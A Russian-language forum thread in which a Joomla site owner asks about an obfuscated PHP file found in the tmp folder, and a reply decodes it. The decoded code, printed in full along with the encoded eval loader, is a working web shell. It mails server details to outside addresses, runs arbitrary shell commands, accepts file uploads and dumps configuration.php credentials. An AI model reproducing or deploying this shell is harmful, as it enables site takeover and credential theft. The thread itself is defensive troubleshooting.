Вирус в папке tmp!

[Elimelech]

Есть сайт на Joomla 2.5.28. Вчера заметил, что в папке tmp появились файлы типа: 20150623063130libs.php.vob со следующим содержанием:

Код:

<?php
set_time_limit(0);
error_reporting(0);

eval(gzinflate(str_rot13(base64_decode('vUl6QuNTEP5cJP7Dso3kUQcJL089AU6ExIHo8tbYdoUATI69VvbiN63XYyniv2pzeifxZGNDnRohkew8z8wz45kdMyFPbgkWhU/yYEner5xhYvEpKe/wOHOyXLIM3TA6g/6tNrG/2gvtvkX57XZ7q/TAcC6dMAkkqZN9IJUe2QS+Im70lz66pdemObSuB4ZW79HMg68F81X/ZqwbpjUeaEXAJGeXgKCmLXNZEpdY5icLOyBqAfpTBxRksT1y/r7LAHvBA2EBuKzhoeWHLtNJCayAFfJHipmTCC6X4N91tGirN3Xp4GDQYdPT5+0t5sXsDUcfQCo0ExETaIg4D3A5TAa2z8qrlLT0v9V1tVNDpyx2tpChACevkVNtYmDqGyTf5l6ZLpLAVoLZ8eHxxdKeh27VCX26WKgqE92l12nMPWWJzwRXNJcyOqnV8jpOxfJH7oLOkBhZPDAUkXJjFxA47YA4B8TBZK6TrgVZE8/z7RlqDv+4mOHR/6jgctcB8wAM61T1AvHpk21TfE3OO/dXN2I1xwsDhl2LWhuHiWPYcxt3U2bUGZpJu9PV+42erqlJZ0wsOamvRK1OZtzT+6Y1GgxZ7b5XeEiPQuJ3NI+wJwVYH3fqf5ekDiqp4F/YsCfYsOSyIfq6+HbfArhfwDrzkNAzyaXHztPzs03663kiztV5uba0FwlB4WPwtz7SW+TyhrTH3WGvZNV2kuag1xv3O+bNBvgQ0YLZMLxGweI5kW7oxcS41rtdg7TNIXYOG329WFOtIek1oM6jDfYRsptuIHpUkobr84Dc9ED6l2S/Oe5fTvsjOJM+BRyJ+T+sflWc0IO+mWsJqj+n1cxflZ7VJqt8XuUJ5hZ1h+/kvYhq9EHi75/VJ+Pmz6tVLsGhlcB81HaZSaFYLDiA1pLqsFyp0sp7cIyBAEhZuFtKnvwlfAUPqxBIV3N44+x741RmGnD/UECKE24ldxoqUjdGuNAkDwMSPU8wguPoPLrpxejgRDq8paQeWCGiMC6jfUqrdndplXYHeh4LlKmyaoAGwXEiAoInSADnRvG0ZK4uhuz8VCHu7j4SA9CvB8kCbsk0KJnwiY/3PkdtiJuQ2KoGaFfP3y51M/R9O2PzAp7xIFckkcuI1alx3yQlS+M6aHyXFq1TMvH52p76oeTBhtbF3wvA10PZuWlNR8rgASkXfuJWHtlPKtweaW2uPEIHs/lWCuPIC3qXtLnHRxo1Ub/Ic85dlwWZ2jjVXgBZgZ+ZsTfxJ81vfkG9vamizx4V+4R5itjwj9VZ2QfHTJyAPeIXVxzPjuO6tAuER3FzoxO5qnqaY6G8G9sIK2mrpeR8HyWK4WVcjNFtBmlXV1TOyeQA6VYZ1P7ChXLcd2xWtHvAKZDqUD98YEnqnbkWAso/pFU/skUaLK2VmqoKk4n5Ja4w2/QeybsCXiiYi/fCM1aXGCnYjcRkSxzDMoE75XtqY2yl9h1PQsmzGrkXlc46Py81DIqqW3P0XbXps7stEnmzjY7yNtpKH7ix4znzPIt9cEEZPamrLe2kGmV24X4pvn/4eAlupm56+K8Swjc1rIr5Ia8aee09z9ZeZPzy1cqdrDMLppAZtoKl9hawbmLFsMaqtfQPIXyWCBtiEfXeR8mTSmcM8i8=')))); ?>

Как от появился этот вирус в этой папке. Что делать, чтобы запретить его появление в будущем?
Спасибо за ответ!

[Elimelech]

а как и куда перенести папку /tmp? Или просто переименовть её? И содать папку типа: /hsphere/local/home/user/сайт.net/tmp356 и прописать путь в админпанели на эту папку.

[MyWeb]

возможно тебе поможет вот эта статья https://joomla.shneider-host.ru/blog/opt...ot-virusov хотя тот кто написал вирус еще его и закодировал =\ т.е что конкретно он делает не понятно... Скорее всего конечно какие-то редиректы.

[qwerty37]

Вот что скрыто за этим кодом:

error_reporting(0);
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Target ditemukan \n$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("kuncung525@yahoo.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
mail("fullmagic27@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
$_SESSION['bajak'] = 1;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/.libs.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF BArNEr";}
else {$security= "SAFE_MODE : ON BArNEr";}
echo "<title>BArNEr</title><br>";
$dataku = "POWERED BY FULLMAGIC COMMUNITY";
$dataku2 = "ready fresh tools SHELLS FTP CPANEL RDP MAILER";
$dataku3 = "Contact Admin YM : KUNCUNG525";
echo "<font size=2 color=blue><b>".$dataku."</b><br>";
echo "<font size=2 color=red><b>".$dataku2."</b><br>";
echo "<font size=2 color=blue><b>".$dataku3."</b><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\\')){
if($u!=strlen($cwd)-1){
return $cwd.'\\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." Succes! "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
elseif(isset($_GET['cmd'])){
$comd = $_GET['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}

if(isset($_GET['db'])){
$conf = file_get_contents("../../../configuration.php");
echo $conf;
}